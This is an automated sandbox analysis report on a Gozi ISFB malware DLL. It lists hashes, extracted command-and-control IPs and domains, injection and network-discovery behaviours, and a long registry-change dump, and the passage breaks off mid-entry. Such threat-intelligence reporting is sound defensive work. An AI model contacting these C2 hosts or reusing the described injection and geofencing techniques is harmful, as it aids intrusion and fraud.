Analysis
Max time kernel: 150s
Max time network: 154s
Platform: windows10-2004_x64
Resource: win10v2004-20220721-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 03-08-2022 09:29

Static task: static1
Behavioral task: behavioral1
Sample: 62ea3f935563b.dll
Resource: win7-20220715-en
General
Target: 62ea3f935563b.dll
Size: 300KB
MD5: 614e312af0e5de7c6b9819e3a1c766d4
SHA1: 01e384618d8eadb244184e66e6450752ea0ceade
SHA256: 982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203
SHA512: 362b32fbc61baf1c757f72d61e582e2741553eda4de022311757a0732a23edabafbcd6affdab97c49d5e1378587b16f1d6730fd9446c801d791056896414d302
Malware Config

Extracted (config 1)
Family: gozi_ifsb
Botnet: 3000
C2: config.edge.skype.com, 37.120.206.71, 37.120.206.84, 193.106.191.163
base_path: /drew/
build: 250240
exe_type: loader
extension: .jlk
server_id: 50

Extracted (config 2)
Family: gozi_ifsb
Botnet: 3000
C2: 37.120.206.91, 37.120.206.95, havefuntxmm.at, 5.42.199.57, xerkdeoleone.at
base_path: /images/
build: 250240
exe_type: worker
extension: .jlk
server_id: 50
Signatures

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes: mshta.exe
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation | mshta.exe

Suspicious use of SetThreadContext (5 IoCs)
Processes: powershell.exe, Explorer.EXE
  description | pid | process | target process
  PID 2160 set thread context of 1032 | 2160 | powershell.exe | Explorer.EXE
  PID 1032 set thread context of 3452 | 1032 | Explorer.EXE | RuntimeBroker.exe
  PID 1032 set thread context of 3752 | 1032 | Explorer.EXE | RuntimeBroker.exe
  PID 1032 set thread context of 4544 | 1032 | Explorer.EXE | RuntimeBroker.exe
  PID 1032 set thread context of 4916 | 1032 | Explorer.EXE | cmd.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Discovers systems in the same network (1 TTP, 3 IoCs)
Processes: net.exe
  pid | process
  5116 | net.exe
  4476 | net.exe
  696 | net.exe

Enumerates processes with tasklist (1 TTP, 1 IoC)

Gathers system information (1 TTP, 1 IoC)
Runs systeminfo.exe.

Modifies registry class (64 IoCs)
Processes:
RuntimeBroker.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\03bd6acb-41d4-47b9- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6bc68a4b-b0ee-4f30- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000064ca497c2ca7d8017048897d2ca7d8017048897d2ca7d801ab4a11000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031
00680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000336566323963656363663661323665316565653439343865326132313733653635376536383162613165353637646132313765346136323130336331306362320000b20009000400efbe0355d95b0355d95b2e00000000000000000000000000000000000000000000000000d2ba9200330065006600320039006300650063006300660036006100320036006500310065006500650034003900340038006500320061003200310037003300650036003500370065003600380031006200610031006500350036003700640061003200310037006500340061003600320031003000330063003100300063006200320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33656632396365636366366132366531656565343934386532613231373365363537653638316261316535363764613231376534613632313033633130636232000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ae0548b61ef08ed11b78de670f6038bdabca7cefcc58482
41ae2fb45b654f157ae0548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7ac56ac6088d2866672963a8250dcfbb3526d3a51b9a3e861858925e66dc0f54" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3ef29ceccf6a26e1eee4948e2a2173e657e681ba1e567da217e4a62103c10cb2" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ee2e1a7d9d3f603ca221d1b8492730e9668343ae08ee9cdca35f68ba826a3e85" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = "0" RuntimeBroker.exe Set value (data) 
\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = 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 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000fff28b7a2ca7d801fff28b7a2ca7d801fff28b7a2ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0
064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000376163353661633630383864323836363637323936336138323530646366626233353236643361353162396133653836313835383932356536366463306635340000b20009000400efbe0355d95b0355d95b2e0000000000000000000000000000000000000000000000000001def600370061006300350036006100630036003000380038006400320038003600360036003700320039003600330061003800320035003000640063006600620062003300350032003600640033006100350031006200390061003300650038003600310038003500380039003200350065003600360064006300300066003500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37616335366163363038386432383636363732393633613832353064636662623335323664336135316239613365383631383538393235653636646330663534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030
000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ad3548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ad3548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = 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 RuntimeBroker.exe Set value (int) 
\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = ff90a47e2ca7d801 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\891988337bcfabadc26731d12a13cf2af72b95139a9f6220c62e6fba3cc17ce3" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = 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 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eafae361-ed19-4d70- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = e868d9802ca7d801 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\269dfa06-9572-4768- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = 52fe557f2ca7d801 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = d2325f802ca7d801 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eafae361-ed19-4d70- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = d8acf77a2ca7d801 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- = 
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 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = 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 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = 3937117b2ca7d801 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ee2e1a7d9d3f603ca221d1b8492730e9668343ae08ee9cdca35f68ba826a3e85" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\e456f0c910cf1e03f73ccd374fb3b13d2523a54a4c17bffcdb526f9b4d2e3054" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = 94fb917a2ca7d801 RuntimeBroker.exe Set 
value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = 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 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\e456f0c910cf1e03f73ccd374fb3b13d2523a54a4c17bffcdb526f9b4d2e3054" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local 
